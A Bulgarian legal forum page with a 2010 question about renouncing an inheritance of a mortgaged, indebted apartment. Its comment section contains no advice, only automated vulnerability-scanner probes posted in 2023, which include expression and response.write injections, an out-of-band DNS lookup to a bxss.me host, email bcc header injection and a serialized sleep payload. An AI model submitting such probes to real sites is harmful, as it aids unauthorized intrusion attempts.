въпрос за наследство

03.06.2010г. 07:00:23
Съпругът ми е наследник с 2-мата си братя и майка си на 3-стаен апартамент, който е ипотекиран и с неплатени сметки в голям размер. Сега го търсят като длъжник, може ли да се откаже сега от това наследство, след като вече има удостоверение за наследник.

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:23
lxbfYeaa
05.10.2023г. 07:23
${10000301+9999021}
lxbfYeaa
05.10.2023г. 07:23
response.write(9547708*9038016)
lxbfYeaa
05.10.2023г. 07:23
&n999853=v966190
lxbfYeaa
05.10.2023г. 07:23
'+response.write(9547708*9038016)+'
lxbfYeaa
05.10.2023г. 07:23
"+response.write(9547708*9038016)+"
lxbfYeaa
05.10.2023г. 07:23
'.gethostbyname(lc('hituc'.'mygwubho14819.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(71).chr(111).chr(79).'
lxbfYeaa
05.10.2023г. 07:23
bcc:009247.5555-63720.5555.3ac2e.19635.2@bxss.me
lxbfYeaa
05.10.2023г. 07:23
ctime sleep p0 (I30 tp1 Rp2 .
lxbfYeaa
05.10.2023г. 07:23
to@example.com> bcc:009247.5555-63724.5555.3ac2e.19635.2@bxss.me

Коментар